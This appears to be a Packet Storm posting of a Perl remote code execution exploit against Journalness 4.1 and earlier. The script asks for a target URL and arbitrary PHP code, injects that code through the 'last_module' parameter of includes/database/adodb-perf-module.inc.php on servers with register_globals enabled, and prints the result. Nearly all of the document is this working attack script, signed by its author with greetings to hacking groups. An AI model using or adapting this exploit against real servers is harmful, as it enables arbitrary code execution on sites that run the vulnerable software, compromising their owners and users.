Journalness versions 4.1 and below remote code execution exploit that makes use of adodb-perf-module.inc.php.
ab50799bf7a0e56cfbbef35d330f519dea48ccbdf87dc461a6317b1e8f82082c#!/usr/bin/perl
#
# Vendor url: journalness.sourceforge.net
#
# note: exploit requires Register_globals = On in php.ini
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
print "#
# Journalness <= 4.1 Remote Code Execution exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group & dHack
#
# Example target url: http://www.target.com/journalnessdir/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=<stdin>);
$code =~ s/(<\?php|\?>|<\?)//ig;
$target .= "includes/database/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};".$code."//";
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($target);
if ($response->is_success)
{
print "\n"."#" x 20 ."\n";
print $response->content;
print "\n"."#" x 20 ."\n";
}
else
{
die "Error: ".$response->status_line;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed